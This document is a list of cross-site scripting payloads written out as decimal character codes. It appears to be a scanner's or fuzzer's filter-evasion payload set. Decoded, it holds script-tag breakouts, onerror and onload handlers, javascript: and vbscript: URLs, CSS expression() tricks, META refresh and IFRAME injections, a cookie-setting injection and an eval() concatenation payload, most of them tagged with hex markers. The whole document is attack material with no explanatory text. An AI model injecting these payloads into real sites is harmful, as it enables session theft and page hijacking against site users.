37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,51,50,37,50,53,50,67,57,55,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,53,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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9,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52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49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,52,55,37,50,53,50,67,52,55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57,56,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,50,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,56,37,50,53,50,67,54,49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56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49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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6,56,37,50,53,50,67,54,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57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6,56,37,50,53,50,67,54,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49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4,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,54,50,37,50,53,50,67,56,56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9,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52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3,51,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,51,52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54,48,37,50,53,50,67,49,49,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52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7,56,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,54,5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34,62,57,55,57,51,56,48,56,101,49,57,52,56,102,51,49,101,53,53,54,99,56,101,98,50,101,52,101,98,48,97,99,48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34,62,60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,102,98,53,102,100,50,100,98,99,53,49,99,48,56,49,48,57,50,52,49,53,48,48,52,101,53,56,55,53,53,55,55,39,41,60,47,83,67,82,73,80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39,39,59,33,45,45,34,60,99,101,101,48,57,54,49,99,52,55,97,56,102,55,52,101,100,53,99,51,48,102,97,57,52,50,55,101,48,49,49,48,62,61,38,123,40,41,125,34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47,84,73,84,76,69,62,100,50,102,50,53,57,98,50,97,55,51,57,52,49,48,102,51,101,99,57,48,99,98,102,54,101,102,97,50,50,51,57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34,62,60,105,109,103,32,115,114,99,61,34,120,58,120,34,32,111,110,101,114,114,111,114,61,34,53,97,52,57,53,53,48,98,55,55,49,99,99,101,100,100,57,100,55,48,101,98,57,48,54,99,50,55,48,99,99,54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6,79,68,89,32,111,110,108,111,97,100,33,35,36,37,38,40,41,42,126,43,45,95,46,44,58,59,63,64,91,47,124,92,93,94,96,61,97,49,50,54,102,54,49,53,101,97,51,52,56,97,48,49,52,53,102,51,56,98,55,99,55,98,102,54,97,48,53,56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39,39,59,33,45,45,34,60,102,57,54,97,50,54,56,51,51,98,101,57,56,55,55,98,99,98,99,102,97,49,102,57,101,101,51,55,57,49,98,49,62,61,38,123,40,41,125,34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34,57,48,49,57,99,100,56,98,53,50,57,99,57,48,48,55,99,56,49,101,54,56,51,55,57,50,54,52,57,100,56,55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56,54,57,102,49,100,49,54,56,49,97,98,97,49,57,57,102,50,48,49,102,98,49,48,101,54,100,100,55,100,54,98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96,55,50,53,51,53,98,57,97,101,57,54,97,102,52,53,54,51,102,53,52,102,102,49,52,53,49,50,101,102,102,54,52,96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34,34,34,62,100,102,56,98,52,56,48,53,102,101,97,52,100,101,97,50,102,97,57,57,54,55,98,100,49,48,102,97,100,102,49,101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34,32,38,35,49,52,59,32,32,50,100,51,51,99,51,57,102,102,53,100,57,100,49,50,49,55,53,99,53,53,99,52,56,54,53,97,97,97,101,97,102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8,73,86,32,83,84,89,76,69,61,34,98,101,104,97,118,105,111,117,114,58,32,117,114,108,40,49,99,57,98,100,57,102,99,50,57,101,55,48,97,50,100,98,48,49,49,102,102,55,97,50,48,55,101,100,56,50,100,41,59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0,83,67,82,73,80,84,62,49,50,51,57,98,51,55,51,98,48,100,53,102,99,102,50,53,52,55,48,53,49,102,100,57,48,101,50,50,99,101,49,47,47,60,60,47,83,67,82,73,80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34,59,54,54,98,98,102,102,49,98,99,99,101,55,50,49,52,52,56,100,53,102,56,52,98,50,50,100,49,49,57,51,54,102,47,47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39,57,99,49,56,97,52,50,100,57,102,50,102,98,56,48,101,51,51,101,51,99,53,48,101,57,102,56,55,97,99,98,99,39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6,79,68,89,32,66,65,67,75,71,82,79,85,78,68,61,34,51,98,53,98,55,49,51,54,100,101,48,53,101,48,50,48,97,49,53,57,56,98,100,50,50,57,49,101,55,102,99,53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8,80,85,84,32,84,89,80,69,61,34,73,77,65,71,69,34,32,83,82,67,61,34,100,49,52,49,56,48,54,101,97,55,53,98,97,100,51,99,51,102,54,50,55,50,55,52,97,50,99,51,101,100,48,98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6,79,68,89,32,79,78,76,79,65,68,61,55,52,97,50,98,52,52,57,49,52,97,100,57,56,102,48,99,55,51,55,55,48,99,48,102,100,102,49,55,102,101,5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68,89,78,83,82,67,61,34,53,54,97,101,100,54,98,51,50,56,100,54,56,98,97,49,48,100,57,57,102,98,53,54,97,55,55,99,51,102,99,102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76,79,87,83,82,67,61,34,98,99,57,100,49,53,54,49,50,57,101,102,54,57,97,102,48,57,101,97,98,53,97,99,53,101,53,53,50,49,57,102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6,71,83,79,85,78,68,32,83,82,67,61,34,54,101,52,98,54,57,49,52,53,98,99,99,52,50,53,56,102,97,48,54,57,50,48,53,52,57,48,100,52,99,55,100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6,82,32,83,73,90,69,61,34,38,123,99,99,99,99,54,101,56,97,53,97,98,98,53,55,50,102,48,57,101,48,48,48,48,98,50,99,53,50,99,57,49,52,125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6,73,78,75,32,82,69,76,61,34,115,116,121,108,101,115,104,101,101,116,34,32,72,82,69,70,61,34,49,101,102,48,55,50,49,56,49,101,101,54,100,56,97,101,100,55,48,56,102,98,55,57,54,102,98,56,102,101,100,97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39,118,98,115,99,114,105,112,116,58,102,48,97,49,52,51,102,54,98,51,54,54,56,52,52,102,99,51,99,49,53,56,51,101,52,57,102,55,101,55,97,97,39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34,109,111,99,104,97,58,91,49,54,98,54,54,49,53,53,57,101,101,48,97,52,57,48,52,55,48,97,48,48,57,51,50,50,53,99,49,49,53,52,93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34,108,105,118,101,115,99,114,105,112,116,58,91,52,98,100,98,52,97,55,57,50,52,48,102,54,97,53,55,50,100,102,101,50,50,101,101,99,50,54,49,57,54,57,49,93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7,69,84,65,32,72,84,84,80,45,69,81,85,73,86,61,34,114,101,102,114,101,115,104,34,32,67,79,78,84,69,78,84,61,34,48,59,117,114,108,61,50,102,49,54,100,56,102,56,97,102,54,52,50,101,51,48,101,101,53,53,54,57,99,98,53,52,57,97,52,56,49,101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4,65,66,76,69,32,66,65,67,75,71,82,79,85,78,68,61,34,102,100,100,53,55,48,48,100,97,99,53,49,102,56,53,101,50,54,99,54,50,101,54,100,56,100,98,52,97,98,54,49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4,65,66,76,69,32,66,65,67,75,71,82,79,85,78,68,61,106,97,118,97,115,99,114,105,112,116,58,51,51,49,48,97,54,100,51,100,48,56,102,52,52,101,56,52,54,50,53,53,49,49,54,50,101,102,57,55,100,50,49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4,65,66,76,69,62,60,84,68,32,66,65,67,75,71,82,79,85,78,68,61,34,54,51,50,56,52,98,55,102,98,57,50,51,99,53,53,56,52,54,101,52,55,48,48,97,102,99,98,56,99,49,50,48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8,73,86,32,83,84,89,76,69,61,34,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,32,117,114,108,40,54,97,102,53,100,102,101,100,98,50,97,57,55,97,48,53,54,52,101,48,57,49,55,49,52,53,102,49,49,50,101,57,41,59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8,73,86,32,83,84,89,76,69,61,34,119,105,100,116,104,58,32,101,120,112,114,101,115,115,105,111,110,40,49,51,52,50,48,98,53,102,53,51,101,56,54,101,53,97,54,101,54,52,53,50,53,97,57,53,99,98,50,97,49,57,41,59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0,82,65,77,69,32,83,82,67,61,34,51,54,98,51,56,54,56,97,102,102,98,54,51,101,102,57,97,52,55,51,50,99,54,102,51,49,57,99,49,102,98,52,34,62,60,47,73,70,82,65,77,69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02,114,97,109,101,47,32,47,111,110,108,111,97,100,61,97,98,51,52,99,55,102,56,56,48,100,48,97,98,100,49,97,53,99,56,98,55,55,99,54,100,57,53,56,48,48,101,62,60,47,105,102,114,97,109,101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02,114,97,109,101,47,32,34,111,110,108,111,97,100,61,52,55,97,98,49,48,50,50,50,56,48,50,100,50,49,48,57,54,52,49,54,56,48,99,102,99,56,100,99,48,97,57,62,60,47,105,102,114,97,109,101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02,114,97,109,101,47,47,47,47,47,47,47,111,110,108,111,97,100,61,49,99,101,51,54,48,98,54,53,53,49,53,56,49,48,56,97,51,56,48,97,100,57,55,53,53,97,49,53,98,97,48,62,60,47,105,102,114,97,109,101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02,114,97,109,101,32,34,111,110,108,111,97,100,61,101,49,57,55,97,99,99,98,56,52,48,55,50,49,100,53,102,102,56,50,50,48,97,49,54,98,54,53,52,101,102,99,62,60,47,105,102,114,97,109,101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02,114,97,109,101,47,32,34,111,110,108,111,97,100,61,51,48,99,98,54,102,53,98,52,99,55,54,101,50,101,49,48,57,50,50,53,55,99,49,50,52,54,48,100,57,48,55,62,60,47,105,102,114,97,109,101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02,114,97,109,101,60,63,112,104,112,32,101,99,104,111,32,99,104,114,40,49,49,41,63,62,32,111,110,108,111,97,100,61,53,101,101,102,102,99,48,56,98,52,50,54,99,52,48,100,101,102,97,101,49,49,53,57,97,99,56,53,102,53,50,55,62,60,47,105,102,114,97,109,101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02,114,97,109,101,60,63,112,104,112,32,101,99,104,111,32,99,104,114,40,49,50,41,63,62,32,111,110,108,111,97,100,61,55,56,99,50,101,57,100,98,54,99,50,49,55,98,100,52,49,57,51,57,56,48,102,48,52,56,49,52,54,55,55,51,62,60,47,105,102,114,97,109,101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0,82,65,77,69,83,69,84,62,60,70,82,65,77,69,32,83,82,67,61,34,55,100,99,101,53,98,53,54,102,55,100,102,51,98,48,49,57,49,102,56,55,49,102,56,52,50,52,55,98,97,48,49,34,62,60,47,70,82,65,77,69,83,69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4,65,66,76,69,32,66,65,67,75,71,82,79,85,78,68,61,34,53,98,49,51,51,55,51,48,97,52,53,54,48,48,102,100,50,53,53,97,99,51,101,52,99,97,53,53,99,101,99,48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4,65,66,76,69,62,60,84,68,32,66,65,67,75,71,82,79,85,78,68,61,34,51,51,49,53,48,56,50,56,102,100,48,48,100,54,55,100,99,53,56,56,57,48,51,97,99,97,48,53,98,97,54,50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8,73,86,32,83,84,89,76,69,61,34,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,32,117,114,108,40,38,35,49,59,52,100,99,97,52,51,101,54,52,100,50,99,99,99,54,98,54,97,102,51,97,99,51,57,99,49,50,97,49,55,98,100,41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8,73,86,32,83,84,89,76,69,61,34,119,105,100,116,104,58,32,101,120,112,114,101,115,115,105,111,110,40,55,102,48,97,51,56,97,102,49,102,51,100,97,55,53,48,49,101,51,52,51,52,55,99,99,52,99,54,49,101,54,51,41,59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4,89,76,69,61,34,120,115,115,58,101,120,112,114,47,42,99,100,99,101,54,99,48,98,101,101,98,101,50,100,51,48,97,54,50,50,99,48,56,49,54,101,100,102,56,101,102,54,42,47,101,115,115,105,111,110,40,99,100,99,101,54,99,48,98,101,101,98,101,50,100,51,48,97,54,50,50,99,48,56,49,54,101,100,102,56,101,102,54,41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52,57,56,54,101,55,101,48,57,49,53,52,48,56,102,48,53,57,50,100,100,56,53,56,100,102,98,48,98,55,102,99,32,83,84,89,76,69,61,34,120,115,115,58,101,120,112,114,101,115,115,105,111,110,40,52,57,56,54,101,55,101,48,57,49,53,52,48,56,102,48,53,57,50,100,100,56,53,56,100,102,98,48,98,55,102,99,41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3,84,89,76,69,32,84,89,80,69,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,57,52,99,57,99,99,97,53,56,54,51,49,56,100,56,51,51,97,53,97,52,52,97,99,57,57,101,55,54,51,48,55,60,47,83,84,89,76,69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3,84,89,76,69,62,46,55,102,102,100,52,49,102,100,50,57,55,50,57,55,51,56,56,48,98,100,97,54,52,99,56,97,54,97,48,100,98,102,123,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,117,114,108,40,34,55,102,102,100,52,49,102,100,50,57,55,50,57,55,51,56,56,48,98,100,97,54,52,99,56,97,54,97,48,100,98,102,34,41,59,125,60,47,83,84,89,76,69,62,60,65,32,67,76,65,83,83,61,55,102,102,100,52,49,102,100,50,57,55,50,57,55,51,56,56,48,98,100,97,54,52,99,56,97,54,97,48,100,98,102,62,60,47,6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3,84,89,76,69,32,116,121,112,101,61,34,116,101,120,116,47,99,115,115,34,62,66,79,68,89,123,98,97,99,107,103,114,111,117,110,100,58,117,114,108,40,34,52,52,52,101,50,53,101,48,99,53,49,55,102,100,53,50,52,54,52,97,102,51,52,97,53,102,101,52,54,99,53,54,34,41,125,60,47,83,84,89,76,69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33,45,45,91,105,102,32,103,116,101,32,73,69,32,52,93,62,101,48,99,53,51,99,57,49,99,49,50,101,51,54,49,57,49,55,99,53,56,99,98,99,55,56,98,56,50,50,56,102,60,33,91,101,110,100,105,102,93,45,4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6,65,83,69,32,72,82,69,70,61,34,50,51,54,101,53,100,101,52,53,54,52,99,50,51,101,53,99,102,56,55,53,57,56,101,49,53,54,102,101,53,56,49,47,47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9,66,74,69,67,84,32,99,108,97,115,115,105,100,61,99,108,115,105,100,58,97,101,50,52,102,100,97,101,45,48,51,99,54,45,49,49,100,49,45,56,98,55,54,45,48,48,56,48,99,55,52,52,102,51,56,57,62,60,112,97,114,97,109,32,110,97,109,101,61,117,114,108,32,118,97,108,117,101,61,57,52,54,57,102,51,102,98,54,53,100,100,98,55,100,56,54,53,48,51,102,100,51,57,99,99,52,53,53,102,50,101,62,60,47,79,66,74,69,67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97,61,34,103,101,116,34,59,98,61,34,85,82,76,40,34,34,59,99,61,34,106,97,118,97,115,99,114,105,112,116,58,34,59,100,61,34,55,52,56,56,53,97,97,101,100,55,100,57,49,53,48,57,48,101,52,50,55,57,49,100,53,101,55,101,52,55,97,49,34,41,34,59,101,118,97,108,40,97,43,98,43,99,43,100,41,59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3,32,101,99,104,111,40,39,60,83,67,82,41,39,59,101,99,104,111,40,39,73,80,84,62,49,99,48,51,53,100,51,102,97,100,53,99,49,50,100,54,48,100,100,101,48,102,101,51,97,97,50,102,54,101,52,53,60,47,83,67,82,73,80,84,62,39,41,59,32,63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7,69,84,65,32,72,84,84,80,45,69,81,85,73,86,61,34,83,101,116,45,67,111,111,107,105,101,34,32,67,111,110,116,101,110,116,61,34,85,83,69,82,73,68,61,38,108,116,59,83,67,82,73,80,84,38,103,116,59,98,52,57,50,51,53,56,51,52,49,97,56,52,98,54,55,54,48,49,50,53,102,50,99,100,102,100,48,98,98,49,53,38,108,116,59,47,83,67,82,73,80,84,38,103,116,59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3,67,82,73,80,84,32,83,82,67,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,62,100,99,48,54,54,100,99,50,53,100,98,50,55,100,49,97,55,53,100,55,53,55,102,54,52,50,51,51,49,53,57,50,60,47,83,67,82,73,80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34,38,49,52,59,106,97,118,97,115,99,114,105,112,116,58,100,102,55,98,48,56,50,101,52,49,54,48,57,54,99,53,48,101,54,52,54,98,97,100,55,55,54,97,102,55,57,51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34,106,97,118,38,35,120,48,68,59,97,115,99,114,105,112,116,58,54,55,55,98,98,53,56,101,51,102,100,102,48,50,100,50,54,53,102,53,97,49,102,97,48,55,97,48,102,48,51,54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45,45,45,32,60,73,77,71,32,83,82,67,61,34,32,38,35,49,52,59,32,32,101,54,99,97,56,54,55,97,101,56,57,52,101,98,51,56,48,50,99,52,49,102,50,49,50,98,52,97,53,102,97,51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45,45,45,32,60,73,77,71,32,83,82,67,61,34,56,97,48,99,57,51,57,51,102,98,48,48,101,101,54,99,49,56,51,54,101,102,48,50,100,52,51,48,99,54,50,99,34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3,67,82,73,80,84,62,97,61,47,54,49,102,56,102,49,97,55,56,55,99,53,97,56,54,57,49,53,55,51,97,99,101,54,99,101,102,57,53,102,53,51,47,97,108,101,114,116,40,97,46,115,111,117,114,99,101,41,60,47,83,67,82,73,80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45,45,45,32,34,59,51,102,50,50,56,102,101,50,99,54,53,99,100,53,48,48,97,48,53,48,51,101,97,101,97,101,97,57,52,100,98,56,59,47,47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7,69,84,65,32,72,84,84,80,45,69,81,85,73,86,111,34,114,101,102,114,101,115,104,34,32,67,79,78,84,69,78,84,61,34,48,59,32,85,82,76,61,104,116,116,112,58,47,47,59,85,82,76,61,55,56,52,51,99,97,100,52,98,51,98,57,97,48,48,102,57,53,51,55,97,98,55,98,101,51,54,57,99,55,50,55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3,67,82,73,80,84,32,60,66,62,61,99,54,53,49,99,52,51,99,51,101,50,50,48,97,56,98,98,48,49,55,102,99,98,53,48,100,48,49,98,50,97,53,34,62,60,47,83,67,82,73,80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0,82,65,77,69,32,83,82,67,61,34,106,97,118,97,115,99,114,105,112,116,58,56,97,57,55,102,57,99,55,50,49,48,55,52,48,98,50,50,100,52,56,56,99,55,53,51,56,48,49,50,101,50,55,32,60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3,67,82,73,80,84,62,97,61,47,101,49,101,101,102,53,53,56,102,50,56,48,49,53,101,51,51,53,51,53,49,48,48,48,101,97,56,101,55,49,53,51,47,110,101,49,101,101,102,53,53,56,102,50,56,48,49,53,101,51,51,53,51,53,49,48,48,48,101,97,56,101,55,49,53,51,60,47,83,67,82,73,80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6,65,89,69,82,32,83,82,67,61,34,106,97,118,97,115,99,114,105,112,116,58,54,54,100,102,55,48,98,49,98,54,49,48,56,49,53,98,102,101,56,99,101,52,100,50,52,56,101,102,102,51,98,54,62,60,47,76,65,89,69,82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3,84,89,76,69,62,108,105,32,123,108,105,115,116,45,115,116,121,108,101,45,105,109,97,103,101,58,32,117,114,108,40,34,49,49,100,53,50,51,57,97,53,57,102,55,98,49,56,99,50,54,101,49,102,97,100,51,48,97,55,55,98,57,97,52,60,47,83,84,89,76,69,62,60,85,76,62,60,76,73,62,49,49,100,53,50,51,57,97,53,57,102,55,98,49,56,99,50,54,101,49,102,97,100,51,48,97,55,55,98,57,97,5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8,73,86,32,83,84,89,76,69,61,34,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,32,117,114,108,40,38,35,49,59,106,97,118,97,115,99,114,105,112,116,58,53,57,100,99,100,102,100,57,57,100,51,101,56,55,52,57,50,49,97,102,51,49,51,51,101,102,49,100,56,51,102,52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49,102,55,48,99,57,54,55,54,52,53,50,99,99,51,100,48,51,50,97,55,51,101,50,52,54,102,50,57,57,54,99,43,65,68,119,45,47,83,67,82,73,80,84,43,65,68,52,45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97,32,104,114,101,102,61,34,106,97,118,97,115,99,114,105,112,116,35,49,97,100,101,51,51,48,53,100,49,100,54,55,97,52,56,56,52,98,97,97,57,99,56,53,99,97,97,102,98,54,101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10,112,117,116,32,116,121,112,101,61,34,105,109,97,103,101,34,32,100,121,110,115,114,99,61,34,56,51,102,53,99,49,57,48,56,54,102,49,56,48,48,97,55,50,101,98,49,49,50,56,98,102,53,101,48,48,52,56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38,56,54,55,102,51,54,50,52,54,57,102,53,102,57,57,55,55,97,57,51,98,55,101,99,101,101,55,53,100,54,57,49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38,123,54,54,52,102,102,55,54,54,100,51,56,99,50,100,49,57,56,101,98,101,52,50,97,51,101,101,49,102,52,48,97,97,125,59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3,77,71,32,83,82,67,61,38,123,51,52,49,50,100,54,54,99,101,99,55,48,102,55,56,57,56,98,98,101,54,51,53,102,57,56,56,99,99,52,101,48,125,59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97,32,104,114,101,102,61,34,97,98,111,117,116,58,51,55,48,102,55,102,52,48,98,55,55,50,97,98,57,97,48,97,100,102,57,98,52,54,56,97,99,101,100,54,52,97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68,73,86,32,83,84,89,76,69,61,34,98,105,110,100,105,110,103,58,32,117,114,108,40,106,97,118,97,115,99,114,105,112,116,58,52,55,99,49,99,49,51,100,98,102,99,98,99,50,97,48,100,57,56,55,57,55,102,57,97,55,102,97,48,